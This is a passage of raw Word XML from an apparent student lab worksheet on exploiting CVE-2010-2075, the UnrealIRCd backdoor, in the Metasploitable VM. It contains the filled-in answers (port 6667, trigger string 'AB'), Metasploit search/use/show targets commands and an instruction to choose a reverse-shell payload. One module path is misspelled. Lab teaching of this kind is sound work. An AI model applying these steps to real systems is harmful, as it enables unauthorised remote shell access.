        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0056491B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> VM.</w:t>
      </w:r>
      <w:r w:rsidR="00130014">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (5 pts)</w:t>
      </w:r>
      <w:r w:rsidR="0056491B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="004720CC">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46B9BAFB" wp14:editId="5571A799">
            <wp:extent cx="2849078" cy="203775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5038" cy="2042014"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00AB013F">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00AB013F">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8690CF" w14:textId="12701FAA" w:rsidR="00E85FDB" w:rsidRPr="004720CC" w:rsidRDefault="000C0457" w:rsidP="00743D4E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1930"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">One of the vulnerabilities in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> VM is </w:t>
      </w:r>
      <w:r w:rsidRPr="000C0457">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CVE-2010-2075</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Research this vulnerability and then answer the following questions.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00AB013F">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">4. What service, and which version of this service, is affected by </w:t>
      </w:r>
      <w:r w:rsidRPr="000C0457">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CVE-2010-2075</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">? </w:t>
      </w:r>
      <w:r w:rsidR="00E85FDB">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Provide a brief description of what the service is normally used for. </w:t>
      </w:r>
      <w:r w:rsidR="00130014">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(5 pts)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1F5A3B" w14:textId="72E03D00" w:rsidR="000C0457" w:rsidRDefault="00834538" w:rsidP="00743D4E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1930"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA16C3">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>UnrealIRC</w:t>
      </w:r>
      <w:r w:rsidR="00AB02CE">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AB02CE">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> version 1</w:t>
      </w:r>
      <w:r w:rsidR="00BD5097">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> and it is an IRC server with many configurable configs.</w:t>
      </w:r>
      <w:r w:rsidR="00BD5097">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000C0457">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="000C0457">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="12AB47D4" w14:textId="77777777" w:rsidR="00E85FDB" w:rsidRDefault="000C0457" w:rsidP="00743D4E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1930"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5. Provide a 1-2 sentence</w:t>
      </w:r>
      <w:r w:rsidR="00130014">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">description of what caused the vulnerability in this service. </w:t>
      </w:r>
      <w:r w:rsidR="00130014">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(5 pts)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54EF5819" w14:textId="5F8B5F2D" w:rsidR="00E85FDB" w:rsidRDefault="004B2C9D" w:rsidP="00743D4E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1930"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004B2C9D">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>UnrealIRCd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004B2C9D">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> contained a backdoor trojan that was available in the download archive. The vulnerability allowed an attacker to execute code by sending the string "AB," which triggered the backdoor, followed by the payload. The command would run as whatever user the IRC daemon was running as, so root-level access could </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>be accessed.</w:t>
      </w:r>
      <w:r w:rsidR="000C0457">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="000C0457">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="000C0457">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">6. If an attacker was able to successfully exploit </w:t>
      </w:r>
      <w:r w:rsidR="000C0457" w:rsidRPr="000C0457">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CVE-2010-2075</w:t>
      </w:r>
      <w:r w:rsidR="000C0457">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, what types of action(s) would they be able to perform on an affected system? </w:t>
      </w:r>
      <w:r w:rsidR="00130014">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(5 pts)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F127A7" w14:textId="310E7C80" w:rsidR="00E85FDB" w:rsidRDefault="00AB02CE" w:rsidP="00743D4E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1930"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB02CE">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>They would be able to execute code to open a shell.</w:t>
      </w:r>
      <w:r w:rsidR="00E85FDB">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00E85FDB">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00E85FDB">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">7. What port does the vulnerable service listen on in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E85FDB">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E85FDB">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> VM? (5 pts)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522B72C8" w14:textId="00CF1C8A" w:rsidR="00130014" w:rsidRDefault="00B760CD" w:rsidP="00743D4E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1930"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001961C3">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>6667</w:t>
      </w:r>
      <w:r w:rsidR="00E85FDB">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00FD6E85">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DECE71D" w14:textId="28201CA4" w:rsidR="00E85FDB" w:rsidRPr="00BA67E1" w:rsidRDefault="00E85FDB" w:rsidP="00E85FDB">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploiting the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> VM</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA67E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="001E579F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>65</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA67E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> pts)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284B3BCE" w14:textId="464CDA6E" w:rsidR="00B8065C" w:rsidRDefault="00B8065C" w:rsidP="00743D4E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1930"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">In this section, you will be asked to provide the commands you ran in the Metasploit console when performing an exploit. Make sure to always provide the full command – do </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>NOT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> use Metasploit’s number shortcut syntax! </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>First, Use the</w:t>
      </w:r>
      <w:r w:rsidR="00E85FDB">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Metasploit console to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>search for and then select</w:t>
      </w:r>
      <w:r w:rsidR="00E85FDB">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> an </w:t>
      </w:r>
      <w:r w:rsidR="002D4749">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">exploit for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>the vulnerable service</w:t>
      </w:r>
      <w:r w:rsidR="002D4749">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>1. What command did you run to search for an exploit for the vulnerable service?</w:t>
      </w:r>
      <w:r w:rsidR="001E579F">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (5 pts)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BCEEEE" w14:textId="7F15B7B6" w:rsidR="00AA16C3" w:rsidRDefault="00AA16C3" w:rsidP="00743D4E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1930"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA16C3">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA16C3">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>UnrealIRCd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004D6D47">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="004D6D47">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00B8065C">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">2. What command did you </w:t>
      </w:r>
      <w:r w:rsidR="004D6D47">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>run to select the exploit you found for the vulnerable service?</w:t>
      </w:r>
      <w:r w:rsidR="001E579F">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (5 pts)</w:t>
      </w:r>
      <w:r w:rsidR="008D729A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00AA16C3">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">use </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>exploit/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>irx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>/unreal_ircd_3281_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11930DAD" w14:textId="6114603D" w:rsidR="00B8065C" w:rsidRPr="008D729A" w:rsidRDefault="008D729A" w:rsidP="00743D4E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1930"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>Next, you will need to configure the target, payload, and other options of the exploit in the Metasploit console. Run a command which lists all possible targets of the exploit you selected.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>3. What command did you run to list all possible targets of your chosen exploit?</w:t>
      </w:r>
      <w:r w:rsidR="001E579F">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (5 pts)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4DD250" w14:textId="20C7242A" w:rsidR="00EC5745" w:rsidRDefault="00AA16C3" w:rsidP="00743D4E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1930"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA16C3">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Show targets</w:t>
      </w:r>
      <w:r w:rsidR="008D729A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="008D729A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">You can leave the target as its default value (automatic). Next, run a command that lists all valid payloads supported by </w:t>
      </w:r>
      <w:r w:rsidR="00EC5745">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>the exploit. Choose the payload that will execute a reverse shell (specifically the Unix system shell) if the exploit is successful. Then, answer the following questions.</w:t>
      </w:r>
      <w:r w:rsidR="00EC5745">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00EC5745">
        <w:rPr>
